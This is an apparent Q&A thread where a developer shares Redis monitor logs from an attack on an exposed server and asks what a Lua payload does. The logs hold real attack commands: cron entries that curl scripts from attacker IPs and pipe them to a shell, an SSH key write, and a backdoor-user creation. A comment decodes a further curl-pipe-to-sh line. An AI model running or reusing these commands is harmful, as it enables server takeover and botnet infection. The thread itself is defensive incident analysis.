# attempt to hack host machine via redis open port

Tags: bash, lua, redis

I have redis with open port in my development machine, these days someone try to get access to my host machine via redis, i have console with redis montiroing and these are commands thay used to get access. I provide datetime for some commands as well.

```
GMT: Monday, August 21, 2017 4:47:53.384 AM [0 74.82.47.3:46986]     "INFO"
[0 94.74.81.202:55564]   "COMMAND"
[0 94.74.81.202:55564]   "flushall"
[0 94.74.81.202:55606]   "COMMAND"

GMT: Monday, August 21, 2017 9:21:43.586 AM [0 94.74.81.202:55606]   "set" "crackit" "\n\n\nssh-rsa .....<ssh_key>.... redis@redis.io\n\n\n\n"
[0 94.74.81.202:55646]   "COMMAND"
[0 185.163.109.66:40470] "INFO"
[0 185.163.109.66:40470] "SCAN" "9000"
[0 74.82.47.5:39660]     "INFO"
[0 98.142.140.13:51586]  "INFO"
[0 98.142.140.13:51586]  "SET" "sxyxgboqet" "\n\n*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh\n\n"
[0 52.14.111.241:58464]  "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\tcurl http://112.74.29.139:8898/1.sh|bash\n\n"
[0 106.2.120.103:41329]  "INFO"
GMT: Tuesday, August 22, 2017 9:56:04.350 PM [0 178.62.175.211:58716] "eval" "local asnum ... see link below "
```

... [the full lua script](https://gist.github.com/ArthurVard/9f4e860e30dfb8acb956043c22f35f30) ...

```
[0 184.105.247.252:33152] "INFO"
GMT: Wednesday, August 23, 2017 7:18:35.995 AM [0 52.14.111.241:49208]   "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\t(useradd -G root axis2;(echo 'asdf1234' | passwd --stdin axis2) || (echo 'axis2:
asdf1234' |chpasswd));crontab -r;:>/etc/crontab;\n\n"
GMT: Wednesday, August 23, 2017 6:04:36.397 PM [0 98.142.140.13:43540]   "INFO"
GMT: Thursday, August 24, 2017 5:22:26.931  AM [0 216.218.206.68:19396]  "INFO"
```

#### these lines from my redis.log file

```
22 Aug 09:59:29.865 AM * RDB: 6 MB of memory used by copy-on-write
22 Aug 09:59:29.951 AM * Background saving terminated with success
22 Aug 09:59:30.137 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.049 AM * 1 changes in 900 seconds. Saving...
23 Aug 07:18:36.052 AM * Background saving started by pid 25388
23 Aug 07:18:36.054 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.153 AM # Background saving error
............. 
repeated every 6 minutes
```

#### Can anybody explain what exaclty doing lua script? according to redis log, i guess,  it tried to eval bash command which holds in "lololili" key.

thank you in advance.

Comment: Your machine is part of a botnet now. So far they created a new user, tried to install minerd (bitcoin) etc. I highly recommend to wipe out the server and reinstall it

Comment: i could not find new user created in machine. what to check else? my crontab is clear.

Comment: reinstall the server

Comment: This script tries to execute `curl http://185.169.198.42/assets/Circle_JJ.png | sh` (this command is encoded in numerous "dwords_to_double" invocations inside Lua script)

Answer (score 2):

Hi it's an attempt to hack your machine.  **You should not expose your redis on the internet without proprer firewalling.**

Judging by waht I've seen I guess this one is trying to exit the lua sandobx.

There is multiplie way to hack your machine if you got an open redis server.

- by exiting the lua sandbox (tried successfully on a redis 2.8.4 with the attached gist a bit modified)
- by uploading bad scripts in an attempt to get them executed by you or your softwares by error. (suing the db

some references on lua sandbox exit

- http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
- https://gist.github.com/firsov/4393cc162ff87e00324a6a53a353bda2

and redis file upload

- https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html

You should check any file belonging to redis on your host

```
find / -user redis
```

If you found nothing, good for you, but secure your server.

Comment: Thank you for links i will look through. I have found files and folder under ``/proc/28493`` folder. this is my development machine and i am going to re-install it asap.

Comment: Any files in /proc are relevant to process currently running no worries here.

Comment: Any files in /proc are relevant to process currently running no worries here.